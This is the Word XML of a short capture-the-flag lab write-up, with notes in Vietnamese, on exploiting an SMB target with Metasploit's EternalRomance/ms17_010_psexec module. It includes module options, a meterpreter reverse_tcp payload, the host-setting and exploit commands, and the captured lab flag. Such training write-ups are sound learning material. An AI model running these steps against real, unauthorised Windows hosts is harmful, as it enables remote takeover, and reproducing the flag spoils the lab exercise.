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02DBA" w14:textId="2297C061" w:rsidR="00C541D1" w:rsidRDefault="00E62E72" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62E72">
        <w:t>Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A768D7B" w14:textId="77777777" w:rsidR="00035EA4" w:rsidRDefault="00035EA4" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296EE940" w14:textId="26580531" w:rsidR="00035EA4" w:rsidRDefault="00035EA4" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>Tìm kiếm EternalRomance và chọn payload dùng tới .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F54BD" w14:textId="0B612902" w:rsidR="00E62E72" w:rsidRDefault="00E62E72" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E674C8E" w14:textId="4E8BD299" w:rsidR="00E62E72" w:rsidRDefault="00E62E72" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r w:rsidRPr="00E62E72">
        <w:t>search  EternalRomance type:exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D358E59" w14:textId="1430C458" w:rsidR="00E62E72" w:rsidRDefault="00E62E72" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="000B6D42">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76B754" w14:textId="0A8EE93F" w:rsidR="00E62E72" w:rsidRDefault="00E62E72" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9ECF63" w14:textId="6C750326" w:rsidR="00E62E72" w:rsidRDefault="000B6D42" w:rsidP="00BC73EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6006B4DA" wp14:editId="4D4CC62E">
            <wp:extent cx="5943600" cy="2099310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20309980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980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9714" w14:textId="1CE8E799" w:rsidR="00196F82" w:rsidRDefault="00196F82" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBC53B8" w14:textId="6AFF03B5" w:rsidR="00196F82" w:rsidRDefault="00196F82" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Xem các thông số của payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00196F82">
        <w:t>exploit/windows/smb/ms17_010_psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E430DC5" w14:textId="2AADB15B" w:rsidR="000B4423" w:rsidRDefault="000B4423" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
      <w:r w:rsidR="000B6D42">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705CF600" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) &gt;&gt; options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39565AE8" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EA4854" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/windows/smb/ms17_010_psexec):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E59461" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607A5395" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name                  Current Setting                           Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE56F31" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----                  ---------------                           --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE79281" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   DBGTRACE              false                                     yes       Show extra debug trace info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC2153" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LEAKATTEMPTS          99                                        yes       How many times to try to leak transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC74B6A" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   NAMEDPIPE                                                       no        A named pipe that can be connected to (leave blank for auto)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4E852" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   NAMED_PIPES           /usr/share/metasploit-framework/data/wor  yes       List of named pipes to check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737137DA" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         dlists/named_pipes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59788A86" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   RHOSTS                                                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006718EA" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                             t/basics/using-metasploit.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E338182" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   RPORT                 445                                       yes       The Target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC0A0E" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SERVICE_DESCRIPTION                                             no        Service description to be used on target for pretty listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A9B47" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SERVICE_DISPLAY_NAME                                            no        The service display name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC3B6D5" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SERVICE_NAME                                                    no        The service name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249BA29" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SHARE                 ADMIN$                                    yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a norm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517773E3" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                             al read/write folder share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA59FC2" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SMBDomain             .                                         no        The Windows domain to use for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EEBC93" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SMBPass                                                         no        The password for the specified username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC55134" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   SMBUser                                                         no        The username to authenticate as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9371E" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51546439" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D95AEE2" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (windows/meterpreter/reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262D536" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049A72E7" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name      Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436CC2E" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----      ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543C665" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041EE7B0" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LHOST     94.237.64.23     yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAF9FE" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT     4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4561D0" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C6288D" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470E87B5" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13790678" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F9E9A9" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2285B77C" w14:textId="77777777" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350EA8F" w14:textId="7EDCE7A2" w:rsidR="00BC73EB" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Automatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D115E63" w14:textId="1937C302" w:rsidR="000B6D42" w:rsidRDefault="000B6D42" w:rsidP="000B6D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824EF87" w14:textId="2E18EC56" w:rsidR="0021253C" w:rsidRDefault="00035EA4" w:rsidP="0021253C">
      <w:r>
        <w:t xml:space="preserve">   Thiết lập thông số cho payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB3E9E7" w14:textId="70383BC1" w:rsidR="00BC73EB" w:rsidRDefault="00BC73EB" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB1498" w14:textId="0A09F775" w:rsidR="00BC73EB" w:rsidRDefault="00BC73EB" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC73EB">
        <w:t>set RHOSTS 10.129.22.126</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E493B" w14:textId="0649E3C0" w:rsidR="00BC73EB" w:rsidRDefault="00BC73EB" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC73EB">
        <w:t>set LHOST 10.10.14.</w:t>
      </w:r>
      <w:r w:rsidR="000B6D42">
        <w:t>54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F856B48" w14:textId="51C1C66D" w:rsidR="00BC73EB" w:rsidRDefault="00BC73EB" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634AA24" w14:textId="3272F9B2" w:rsidR="00BC73EB" w:rsidRDefault="000B6D42" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE1E4B9" wp14:editId="46A8A0BC">
            <wp:extent cx="5943600" cy="835025"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="581363712" name="Picture 1" descr="A computer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363712" name="Picture 1" descr="A computer screen with red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4F756" w14:textId="77777777" w:rsidR="004E6BB1" w:rsidRDefault="004E6BB1" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2DC843" w14:textId="4BD0E369" w:rsidR="004E6BB1" w:rsidRDefault="004E6BB1" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bắt đầu khai thác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264364ED" w14:textId="2CE6CF21" w:rsidR="0039277E" w:rsidRDefault="0039277E" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776602E" w14:textId="100FA156" w:rsidR="0039277E" w:rsidRDefault="000077A9" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0039277E">
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BADE603" w14:textId="1CD3C585" w:rsidR="0039277E" w:rsidRDefault="0039277E" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2C2B0" w14:textId="7CAAF03A" w:rsidR="0039277E" w:rsidRDefault="0039277E" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44CEEE3C" wp14:editId="2E8D1A8B">
            <wp:extent cx="5943600" cy="1872615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20392569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256948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73ED" w14:textId="77777777" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710B4EE1" w14:textId="7F4BA1E2" w:rsidR="00354EC5" w:rsidRDefault="00354EC5" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm file flag.txt trên toàn hệ thống </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B6E1F" w14:textId="0EEB398B" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E5E503" w14:textId="4E438A5D" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r w:rsidRPr="002D3D47">
        <w:t>search -f flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CECAA" w14:textId="6E95114C" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65EEF0" w14:textId="7456871A" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3689D3E0" wp14:editId="652938EA">
            <wp:extent cx="5943600" cy="1387475"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1804201179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01179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6BEF9" w14:textId="77777777" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596DF8C5" w14:textId="78657E0B" w:rsidR="00354EC5" w:rsidRDefault="00354EC5" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đọc file flag.txt để lấy flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C510D24" w14:textId="138E6965" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2BB01" w14:textId="5A1496EF" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r w:rsidRPr="002D3D47">
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B203D22" w14:textId="0811CEE4" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBC3F28" w14:textId="79CEB627" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A2EE271" wp14:editId="597C36E5">
            <wp:extent cx="5943600" cy="544195"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1106283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833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EED67" w14:textId="77777777" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1BE55E" w14:textId="78786783" w:rsidR="002D3D47" w:rsidRDefault="002D3D47" w:rsidP="00E62E72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3D47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D3D47">
        <w:t>HTB{MSF-W1nD0w5-3xPL01t4t10n}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002D3D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2C172A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C95ED914"/>
    <w:lvl w:ilvl="0" w:tplc="AAC841B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202382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D1"/>
    <w:rsid w:val="000077A9"/>
    <w:rsid w:val="00035EA4"/>
    <w:rsid w:val="000B4423"/>
    <w:rsid w:val="000B6D42"/>
    <w:rsid w:val="00196F82"/>
    <w:rsid w:val="0021253C"/>
    <w:rsid w:val="002D3D47"/>
    <w:rsid w:val="00354EC5"/>
    <w:rsid w:val="0039277E"/>
    <w:rsid w:val="00454711"/>
    <w:rsid w:val="004E6BB1"/>
    <w:rsid w:val="00BC73EB"/>
    <w:rsid w:val="00C53D2E"/>
    <w:rsid w:val="00C541D1"/>
    <w:rsid w:val="00E6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A780"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{44E2FA78-249D-4049-ADAB-DA493128E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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-18T05:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-18T06:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>